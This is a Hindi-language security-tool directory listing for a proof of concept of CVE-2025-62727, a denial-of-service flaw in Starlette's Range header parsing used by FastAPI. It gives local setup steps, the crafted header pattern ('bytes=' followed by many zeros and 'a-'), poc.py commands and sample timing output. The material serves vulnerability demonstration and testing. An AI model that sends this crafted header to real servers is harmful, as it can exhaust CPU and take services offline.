Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-62727-Demo — CVE-2025-62727 का प्रूफ ऑफ कॉन्सेप्ट जो FastAPI (आधारित Starlette <= 0.48.0) में denial-of-service उत्पन्न कर सकता है | Kitploit
उपकरण/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
भेद्यता विश्लेषणशोषणवेब सुरक्षाAPI सुरक्षा
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

CVE-2025-62727 का प्रूफ ऑफ कॉन्सेप्ट जो FastAPI (आधारित Starlette <= 0.48.0) में denial-of-service उत्पन्न कर सकता है

रिपॉजिटरी देखें
12411 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-62727 डेमो

पीड़ित का विवरण

CVE-2025-62727 का लक्षित पीड़ित एक सरल FastAPI ऐप है जो:

  • / पर Hello World प्रदान करता है।
  • Starlette के StaticFiles का उपयोग करके /static के अंतर्गत स्थिर फ़ाइलें प्रदान करता है।
  • स्टार्टअप पर 1024, 2048, 50176 के लिए N बार दोहराया गया A युक्त टेक्स्ट फ़ाइलें स्वतः उत्पन्न करता है।

पीड़ित को कैसे चलाएं

  1. (वैकल्पिक) virtualenv बनाएं और सक्रिय करें।

  2. निर्भरताएँ स्थापित करें:

    pip install -r requirements.txt
    
  3. सर्वर प्रारंभ करें:

    uvicorn main:app --reload
    
  4. खोलें:

  • इंडेक्स पेज के लिए http://127.0.0.1:8000/।
  • स्थिर फ़ाइलों के लिए http://127.0.0.1:8000/static/1024.txt आदि।

नोट्स

  • स्थिर फ़ाइलें ऐप स्टार्टअप पर static/ निर्देशिका के अंतर्गत उत्पन्न होती हैं। मौजूदा फ़ाइलें अधिलेखित नहीं होती हैं।
  • स्थिर प्रदान करना अनुरोध के अनुसार Starlette के StaticFiles का उपयोग करता है।

PoC: CVE-2025-62727 (Range हेडर पार्सिंग)

शामिल poc.py /static रूट के माध्यम से bytes=000...000a- रूप के एक क्राफ्टेड हेडर का उपयोग करके Starlette के FileResponse में CPU-गहन Range पार्सिंग को ट्रिगर करता है।

सर्वर चलाएं, फिर दूसरे शेल में:

python3 poc.py --sizes 1000,2000,4000,7000

लक्ष्य URL को ओवरराइड करें (वैकल्पिक):

python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000

नोट्स:

  • PoC डिफ़ॉल्ट रूप से http://127.0.0.1:8000/static/50176.txt (ऐप द्वारा उत्पन्न एक फ़ाइल) को लक्षित करता है। इसे बदलने के लिए --url का उपयोग करें।
  • यदि आप 400/431 (हेडर बहुत बड़ा) देखते हैं तो --sizes को कम करें, या यदि हेडर सफल होते हैं और आप एक मजबूत प्रभाव चाहते हैं तो ऊपर की ओर समायोजित करें।

परिणाम उदाहरण:

$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
टूल डाउनलोड करें